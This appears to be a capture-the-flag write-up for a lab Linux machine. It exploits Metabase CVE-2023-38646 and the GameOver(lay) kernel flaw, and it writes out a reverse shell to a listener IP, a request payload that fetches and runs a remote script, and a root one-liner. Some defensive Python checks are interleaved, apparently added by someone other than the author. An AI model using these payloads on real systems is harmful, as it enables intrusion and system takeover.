Analytics

19th March 2024 / Document No D24.100.275

Prepared By: k1ph4ru

Machine Author: 7u9y & TheCyberGeek

Difficulty: Easy

Classification: Official

Synopsis
Analytics is an easy difficulty Linux machine with exposed HTTP and SSH services. Enumeration of
the website reveals a Metabase instance, which is vulnerable to Pre-Authentication Remote Code
Execution (CVE-2023-38646); this is leveraged to gain a foothold inside a Docker container.
Enumerating the Docker container, we see that the environment variables that have been set contain
credentials that can be used to SSH into the host. Post-exploitation enumeration reveals that the
kernel version running on the host is vulnerable to GameOver(lay), which is leveraged to obtain root
privileges.

Skills Required
Web Enumeration

Linux Fundamentals

Skills Learned
Metabase Enumeration

Command Injection for Remote Code Execution

Kernel exploitation

Enumeration
Nmap

ports=$(nmap -p- --min-rate=1000 -T4 10.129.229.224 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.229.224

Nmap reveals two open ports: SSH is running on port 22 and an Nginx web server on port 80.
Since we do not have any credentials to log in via SSH, we will start by looking at port 80.

HTTP
Browsing to port 80, we notice we are being redirected to analytical.htb. We add the domain
to our /etc/hosts file to resolve it:

echo "10.129.229.224 analytical.htb" | sudo tee -a /etc/hosts


The web server is hosting the website of a research and data analysis company. We notice that there
is a login section at the top of the page, which redirects us to data.analytical.htb. We need to
add this subdomain to the /etc/hosts file as well, in order to access the page.

echo "10.129.229.224 data.analytical.htb" | sudo tee -a /etc/hosts

We see that there is a Metabase instance running. Metabase is an open source tool that allows
for powerful data instrumentation, visualization, and querying. It allows users to easily create and
share interactive dashboards, perform ad-hoc queries, and analyze data from various sources.

Foothold
Since we do not have credentials to access the Metabase instance we try looking at the version to
see if we find any vulnerabilities.

curl http://data.analytical.htb/ | grep version


We see that the version running is v0.46.6, which, according to this blog, is vulnerable to
Pre-Authentication Remote Code Execution (CVE-2023-38646). This vulnerability occurs because
unauthenticated users can access a special token called setup-token, which is used for completing
the setup process. The token remains active even after setup is done and can be read by
unauthorized users. Exploiting this, one can send a crafted POST request to the /api/setup/validate
endpoint, potentially achieving code execution.

We can find the token by accessing the /api/session/properties endpoint and searching for
setup-token.

Armed with the setup token, we can send a POST request to the /api/setup/validate endpoint to
achieve remote code execution.

Note: Metasploit has since released a module to automate this exploit, but we will go
through the motions manually. To use the Metasploit module, enter msfconsole and load it
via use exploit/linux/http/metabase_setup_token_rce .
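A defender-side check for the precondition just described, added here as an example (it is not the write-up's or Metabase's own code): it reads a saved /api/session/properties body and reports whether the setup token is still exposed after setup has completed and whether the reported version predates a patched release. The "has-user-setup" field and the fixed release tag passed by the caller are assumptions to verify against the vendor advisory.

```python
import json

# Constructed sample of an unauthenticated GET /api/session/properties response,
# trimmed to the fields this check reads. "setup-token" and "version" are the
# fields the write-up refers to; "has-user-setup" is assumed to be the property
# Metabase uses to report that initial setup has already been completed.
SAMPLE_PROPERTIES = json.dumps({
    "version": {"tag": "v0.46.6"},
    "has-user-setup": True,
    "setup-token": "00000000-0000-4000-8000-000000000000",  # constructed placeholder
})

# Assumption: first release that stops leaking the token; confirm in the advisory.
FIRST_FIXED_TAG = "v0.46.6.1"


def parse_version_tag(tag):
    """'v0.46.6' -> (0, 46, 6), so releases can be compared as tuples."""
    return tuple(int(part) for part in tag.lstrip("v").split("."))


def audit_session_properties(body, first_fixed_tag=FIRST_FIXED_TAG):
    """Return findings for one /api/session/properties body (empty = nothing found)."""
    props = json.loads(body)
    findings = []
    token = props.get("setup-token")
    setup_done = bool(props.get("has-user-setup"))
    version = props.get("version", {}).get("tag", "")

    if token and setup_done:
        findings.append("setup-token still exposed after setup completed")
    elif token and not setup_done:
        findings.append("instance not yet set up: token is exposed by design, finish or remove it")
    if version and parse_version_tag(version) < parse_version_tag(first_fixed_tag):
        findings.append(f"version {version} predates the fixed release {first_fixed_tag}")
    return findings


if __name__ == "__main__":
    for finding in audit_session_properties(SAMPLE_PROPERTIES):
        print("-", finding)
```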

First, we save a reverse shell payload to a file, in order to host it on a local web server:

echo -e '#!/bin/bash\nsh -i >& /dev/tcp/10.10.14.70/4444 0>&1' > rev.sh

The above one-liner command will create a Bash script named rev.sh in our current working
folder. This is what we will use to initiate the reverse shell connection to our Netcat listener,
using the exploit.

As we have our Bash reverse shell script ready, let's start a Python web server on port 8081, in
the same directory where we saved the script.

python3 -m http.server 8081

We will use the below command to start a Netcat listener, which we will use to interact with our
reverse shell connection once our script has been executed.

nc -lnvp 4444

Finally, we use the PoC from the aforementioned blog to construct a POST request, in order to
retrieve our reverse shell from the local server and execute it. To accomplish this, we utilize the
Repeater feature in Burp Suite.

Navigating BurpSuite is beyond the scope of this writeup, but those interested can refer to
the Academy module Using Web Proxies.

The request looks as follows:

POST /api/setup/validate HTTP/1.1
Host: data.analytical.htb
Content-Type: application/json
Content-Length: 566

{
  "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
  "details":
  {
    "is_on_demand": false,
    "is_full_sync": false,
    "is_sample": false,
    "cache_ttl": null,
    "refingerprint": false,
    "auto_run_queries": true,
    "schedules":
    {},
    "details":
    {
      "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {curl,10.10.14.70:8081/rev.sh}|bash')\n$$--=x",
      "advanced-options": false,
      "ssl": true
    },
    "name": "an-sec-research-team",
    "engine": "h2"
  }
}

Sending the request triggers a callback to our webserver, which subsequently sends a connection
back to our Netcat listener.
We have obtained a shell as the metabase user.
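For the detection side of the request shown above, an added example that is not part of the write-up: a triage function that inspects a captured POST /api/setup/validate body for an H2 connection string carrying smuggled SQL or a code-execution trigger, of the kind used in CVE-2023-38646. The sample bodies are constructed; the malicious one mirrors the request structure with the shell command replaced by a placeholder.

```python
import json
import re

# Patterns that have no business in a database connection string: SQL smuggled
# after ';' (CREATE TRIGGER, INIT=, RUNSCRIPT), source-code trigger bodies
# delimited by $$, and Java process-execution APIs.
SUSPICIOUS_DB_URL = [
    (re.compile(r";\s*CREATE\s+TRIGGER", re.I), "CREATE TRIGGER smuggled into connection string"),
    (re.compile(r";\s*INIT\s*=", re.I), "INIT= script in connection string"),
    (re.compile(r"\bRUNSCRIPT\b", re.I), "RUNSCRIPT in connection string"),
    (re.compile(r"\$\$\s*//\s*(javascript|groovy)", re.I), "source-code trigger body"),
    (re.compile(r"java\.lang\.Runtime|ProcessBuilder"), "Java process execution API"),
]


def inspect_setup_validate(body):
    """Return reasons a POST /api/setup/validate body looks like CVE-2023-38646
    abuse; an empty list means nothing matched."""
    try:
        req = json.loads(body)
    except ValueError:
        return ["body is not valid JSON"]
    details = req.get("details") or {}
    db_url = str((details.get("details") or {}).get("db", ""))
    findings = []
    if details.get("engine") == "h2":
        findings.append("engine is h2 (embedded database driver)")
        if db_url.startswith("zip:") or "metabase.jar" in db_url:
            findings.append("connection string points inside metabase.jar")
    findings += [why for pattern, why in SUSPICIOUS_DB_URL if pattern.search(db_url)]
    return findings


# Constructed samples: the first is modelled on the request in the write-up with
# the shell command replaced by a placeholder; the second is an ordinary
# validation of a Postgres connection.
MALICIOUS_BODY = json.dumps({
    "token": "00000000-0000-4000-8000-000000000000",
    "details": {"engine": "h2", "details": {
        "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;"
              "TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON "
              "INFORMATION_SCHEMA.TABLES AS $$//javascript\n"
              "java.lang.Runtime.getRuntime().exec('<command>')\n$$--=x"}},
})
BENIGN_BODY = json.dumps({
    "token": "00000000-0000-4000-8000-000000000000",
    "details": {"engine": "postgres", "details": {"db": "analytics", "host": "db.internal"}},
})
```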

Lateral Movement
It quickly becomes evident that we are inside a Docker container, as indicated by the hostname
and the existence of a .dockerenv file in /.

Running the printenv command displays any environment variables that have been set.

printenv

Within the output, we find the credentials metalytics:An4lytics_ds20223# . We try using this
combination to SSH into the machine.

ssh metalytics@analytical.htb

Our attempt is successful, as we have authenticated as the metalytics user on the host. The user
flag can be found at /home/metalytics/user.txt .

Privilege Escalation
Enumerating the kernel version, we see that the target is running kernel 6.2.0-25.

uname -a

We also see that the box is on the jammy release.

lsb_release -a

A Google search reveals a vulnerability dubbed GameOver(lay), in the OverlayFS module in
Ubuntu, which has been assigned both CVE-2023-2640 and CVE-2023-32629. Kernel 6.2.0 on
Ubuntu 22.04 LTS (Jammy Jellyfish), which we currently find ourselves on, is noted as one of
the affected releases.

On a high level, OverlayFS, a union filesystem, allows for the overlaying of one filesystem on top
of another, facilitating modifications to files without changing the base filesystem. This feature is
particularly useful in applications like Docker containers, where it's essential to keep the base
image unchanged while modifications are applied in a separate layer. The flexibility of OverlayFS,
however, introduces potential security risks. It enables scenarios where users can bypass certain
filesystem restrictions (e.g., mount options like nodev or nosuid) by masking filesystems.
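An added exposure check for the GameOver(lay) precondition (not from the write-up or any vendor tool): it parses an Ubuntu kernel release string as printed by uname -r, compares it with the first fixed kernel the caller supplies from the Ubuntu security notice, and also reports whether unprivileged user namespaces are disabled, since the public PoC relies on one (unshare -rm). The "-generic" flavour and the fixed ABI used in the sample call are assumptions to verify against the USN for the host's kernel series.

```python
import re

# Ubuntu kernel release strings look like "6.2.0-25-generic": upstream version,
# Ubuntu ABI number and an optional flavour.
KERNEL_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)(?:-([\w-]+))?$")


def parse_ubuntu_kernel(uname_r):
    """'6.2.0-25-generic' -> ((6, 2, 0), 25, 'generic')."""
    m = KERNEL_RE.match(uname_r.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {uname_r!r}")
    major, minor, patch, abi, flavour = m.groups()
    return (int(major), int(minor), int(patch)), int(abi), flavour


def gameoverlay_exposure(uname_r, first_fixed, userns_clone):
    """Classify a host against CVE-2023-2640 / CVE-2023-32629.

    first_fixed:  (upstream version, ABI) of the first patched kernel for the
                  host's series, taken from the Ubuntu security notice
                  (caller input, deliberately not hardcoded here).
    userns_clone: contents of /proc/sys/kernel/unprivileged_userns_clone; the
                  PoC needs an unprivileged user namespace, so "0" blocks that
                  path even on an unpatched kernel.
    """
    version, abi, _ = parse_ubuntu_kernel(uname_r)
    fixed_version, fixed_abi = first_fixed
    if version != fixed_version:
        return "unknown: advisory data is for a different kernel series"
    if abi >= fixed_abi:
        return "patched"
    if userns_clone.strip() == "0":
        return "unpatched, but unprivileged user namespaces are disabled"
    return "vulnerable: unpatched kernel and unprivileged user namespaces enabled"


if __name__ == "__main__":
    # Sample inputs: the kernel from the write-up and a sysctl value of "1".
    # The fixed ABI (26) is an assumption; confirm it in the USN for jammy.
    print(gameoverlay_exposure("6.2.0-25-generic", ((6, 2, 0), 26), "1\n"))
```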

Various Proof of Concept (PoC) scripts have since been published. We can use the following
one-liner to gain a shell as root:

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'

The root flag can be obtained at /root/root.txt .
